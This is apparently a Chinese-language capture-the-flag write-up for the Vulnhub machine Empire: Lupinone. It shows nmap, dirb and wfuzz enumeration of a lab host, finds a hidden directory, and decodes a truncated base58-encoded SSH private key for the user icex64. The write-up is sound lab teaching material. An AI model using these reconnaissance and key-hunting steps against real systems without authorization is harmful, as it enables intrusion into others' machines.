EMPIRE: LUPINONE
Difficulty: Medium
kali攻击机ip:192.168.30.130
靶机ip:192.168.30.135
网络扫描
1
nmap -A 192.168.30.135
开放22、80端口,扫描文件
1
dirb 192.168.30.135
发现robots.txt,内容:
1
2
User-agent: *
Disallow: /~myfiles
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
curl http://192.168.30.135/~myfiles/
##
<!DOCTYPE html>
<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Error 404</h1>
</body>
</html>
<!-- Your can do it, keep trying. -->
查找其他目录下~myfiles文件,无果。查找和~myfiles文件格式类似文件
1
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.30.135/~FUZZ
找到~secret,code:301。使用浏览器访问
1
2
3
4
5
Hello Friend, Im happy that you found my secret diretory, I created like this to share with you my create ssh private key file,
Its hided somewhere here, so that hackers dont find it and crack my passphrase with fasttrack.
I'm smart I know that.
Any problem let me know
Your best friend icex64
Tps:用户名:icex64,sshkey
1
cGxD6KNZQddY6iCsSuqPzU......zDgKm2gSRN8gHz3WqS
base58解码:
1
2
3
4
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEA......4ORlsC
iUJ66WmRUN9EoVlkeCzQJwivI=
-----END OPENSSH PRIVATE KEY-----